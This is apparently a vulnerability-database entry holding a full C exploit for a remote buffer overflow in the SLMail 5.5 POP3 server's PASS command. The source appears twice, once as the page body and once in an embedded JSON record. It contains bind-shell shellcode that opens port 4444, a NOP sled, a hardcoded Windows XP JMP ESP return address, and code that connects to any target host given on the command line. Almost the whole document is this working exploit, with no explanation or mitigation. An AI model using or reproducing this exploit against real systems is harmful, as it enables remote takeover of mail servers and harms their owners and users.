Search...

SLMail 5.5 - Remote Buffer Overflow Exploit

2014-07-01T00:00:00

ID SSV:62916
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                /*
SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov ????-?????
???????????????? 31337 Team
*/

#include &#60;string.h&#62;
#include &#60;stdio.h&#62;
#include &#60;winsock2.h&#62;
#include &#60;windows.h&#62;

// [*] bind 4444 
unsigned char shellcode[] = 
&#34;\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45&#34;
&#34;\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49&#34;
&#34;\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d&#34;
&#34;\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66&#34;
&#34;\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61&#34;
&#34;\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40&#34;
&#34;\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32&#34;
&#34;\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6&#34;
&#34;\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09&#34;
&#34;\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0&#34;
&#34;\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff&#34;
&#34;\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53&#34;
&#34;\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff&#34;
&#34;\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64&#34;
&#34;\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89&#34;
&#34;\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab&#34;
&#34;\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51&#34;
&#34;\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53&#34;
&#34;\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6&#34;
&#34;\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0&#34;;

void exploit(int sock) {
      FILE *test;
      int *ptr;
      char userbuf[] = &#34;USER madivan\r\n&#34;;
      char evil[3001];
      char buf[3012];
      char receive[1024];
      char nopsled[] = &#34;\x90\x90\x90\x90\x90\x90\x90\x90&#34;
                       &#34;\x90\x90\x90\x90\x90\x90\x90\x90&#34;;
      memset(buf, 0x00, 3012);
      memset(evil, 0x00, 3001);
      memset(evil, 0x43, 3000);
      ptr = &evil;
      ptr = ptr + 652; // 2608 
      memcpy(ptr, &nopsled, 16);
      ptr = ptr + 4;
      memcpy(ptr, &shellcode, 317);
      *(long*)&evil[2600] = 0x7CB41010; // JMP ESP XP 7CB41020 FFE4 JMP ESP

      // banner
      recv(sock, receive, 200, 0);
      printf(&#34;[+] %s&#34;, receive);
      // user
      printf(&#34;[+] Sending Username...\n&#34;);
      send(sock, userbuf, strlen(userbuf), 0);
      recv(sock, receive, 200, 0);
      printf(&#34;[+] %s&#34;, receive);
      // passwd
      printf(&#34;[+] Sending Evil buffer...\n&#34;);
      sprintf(buf, &#34;PASS %s\r\n&#34;, evil);
      //test = fopen(&#34;test.txt&#34;, &#34;w&#34;);
      //fprintf(test, &#34;%s&#34;, buf);
      //fclose(test);
      send(sock, buf, strlen(buf), 0);
      printf(&#34;[*] Done! Connect to the host on port 4444...\n\n&#34;);
}

int connect_target(char *host, u_short port)
{
    int sock = 0;
    struct hostent *hp;
    WSADATA wsa;
    struct sockaddr_in sa;

    WSAStartup(MAKEWORD(2,0), &wsa);
    memset(&sa, 0, sizeof(sa));

    hp = gethostbyname(host);
    if (hp == NULL) {
        printf(&#34;gethostbyname() error!\n&#34;); exit(0);
    }
    printf(&#34;[+] Connecting to %s\n&#34;, host);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr = **((struct in_addr **) hp-&#62;h_addr_list);

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock &#60; 0)      {
        printf(&#34;[-] socket blah?\n&#34;);
        exit(0);
        }
    if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) &#60; 0)
        {printf(&#34;[-] connect() blah!\n&#34;);
        exit(0);
          }
    printf(&#34;[+] Connected to %s\n&#34;, host);
    return sock;
}


int main(int argc, char **argv)
{
    int sock = 0;
    int data, port;
    printf(&#34;\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n&#34;);
    printf(&#34;[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n&#34;);
    if ( argc &#60; 2 ) { printf(&#34;usage: slmail-ex.exe &#60;host&#62; \n\n&#34;); exit(0); }
    port = 110;
    sock = connect_target(argv[1], port);
    exploit(sock);
    closesocket(sock);
    return 0;
}

JSON Vulners Source

Initial Source

{"lastseen": "2017-11-19T16:33:08", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "poc", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2017-11-19T16:33:08", "rev": 2}, "dependencies": {"references": [], "modified": "2017-11-19T16:33:08", "rev": 2}, "vulnersScore": 0.1}, "href": "https://www.seebug.org/vuldb/ssvid-62916", "references": [], "enchantments_done": [], "id": "SSV:62916", "title": "SLMail 5.5 - Remote Buffer Overflow Exploit", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 34, "sourceData": "\n /*\r\nSLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov ????-?????\r\n???????????????? 31337 Team\r\n*/\r\n\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <winsock2.h>\r\n#include <windows.h>\r\n\r\n// [*] bind 4444 \r\nunsigned char shellcode[] = \r\n"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45"\r\n"\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49"\r\n"\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d"\r\n"\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66"\r\n"\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61"\r\n"\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40"\r\n"\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32"\r\n"\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6"\r\n"\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09"\r\n"\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0"\r\n"\\x66\\x68\\x11\\x5c\\x66\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff"\r\n"\\xd6\\x6a\\x10\\x51\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53"\r\n"\\x55\\xff\\xd0\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff"\r\n"\\xd0\\x93\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64"\r\n"\\x66\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89"\r\n"\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38\\xab"\r\n"\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57\\x52\\x51"\r\n"\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\\xce\\x53"\r\n"\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83\\xc4\\x64\\xff\\xd6"\r\n"\\x52\\xff\\xd0\\x68\\xf0\\x8a\\x04\\x5f\\x53\\xff\\xd6\\xff\\xd0";\r\n\r\nvoid exploit(int sock) {\r\n FILE *test;\r\n int *ptr;\r\n char userbuf[] = "USER madivan\\r\\n";\r\n char evil[3001];\r\n char buf[3012];\r\n char receive[1024];\r\n char nopsled[] = "\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90"\r\n "\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90";\r\n memset(buf, 0x00, 3012);\r\n memset(evil, 0x00, 3001);\r\n memset(evil, 0x43, 3000);\r\n ptr = &evil;\r\n ptr = ptr + 652; // 2608 \r\n memcpy(ptr, &nopsled, 16);\r\n ptr = ptr + 4;\r\n memcpy(ptr, &shellcode, 317);\r\n *(long*)&evil[2600] = 0x7CB41010; // JMP ESP XP 7CB41020 FFE4 JMP ESP\r\n\r\n // banner\r\n recv(sock, receive, 200, 0);\r\n printf("[+] %s", receive);\r\n // user\r\n printf("[+] Sending Username...\\n");\r\n send(sock, userbuf, strlen(userbuf), 0);\r\n recv(sock, receive, 200, 0);\r\n printf("[+] %s", receive);\r\n // passwd\r\n printf("[+] Sending Evil buffer...\\n");\r\n sprintf(buf, "PASS %s\\r\\n", evil);\r\n //test = fopen("test.txt", "w");\r\n //fprintf(test, "%s", buf);\r\n //fclose(test);\r\n send(sock, buf, strlen(buf), 0);\r\n printf("[*] Done! Connect to the host on port 4444...\\n\\n");\r\n}\r\n\r\nint connect_target(char *host, u_short port)\r\n{\r\n int sock = 0;\r\n struct hostent *hp;\r\n WSADATA wsa;\r\n struct sockaddr_in sa;\r\n\r\n WSAStartup(MAKEWORD(2,0), &wsa);\r\n memset(&sa, 0, sizeof(sa));\r\n\r\n hp = gethostbyname(host);\r\n if (hp == NULL) {\r\n printf("gethostbyname() error!\\n"); exit(0);\r\n }\r\n printf("[+] Connecting to %s\\n", host);\r\n sa.sin_family = AF_INET;\r\n sa.sin_port = htons(port);\r\n sa.sin_addr = **((struct in_addr **) hp->h_addr_list);\r\n\r\n sock = socket(AF_INET, SOCK_STREAM, 0);\r\n if (sock < 0) {\r\n printf("[-] socket blah?\\n");\r\n exit(0);\r\n }\r\n if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0)\r\n {printf("[-] connect() blah!\\n");\r\n exit(0);\r\n }\r\n printf("[+] Connected to %s\\n", host);\r\n return sock;\r\n}\r\n\r\n\r\nint main(int argc, char **argv)\r\n{\r\n int sock = 0;\r\n int data, port;\r\n printf("\\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\\n");\r\n printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\\n\\n");\r\n if ( argc < 2 ) { printf("usage: slmail-ex.exe <host> \\n\\n"); exit(0); }\r\n port = 110;\r\n sock = connect_target(argv[1], port);\r\n exploit(sock);\r\n closesocket(sock);\r\n return 0;\r\n}\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-62916", "type": "seebug"}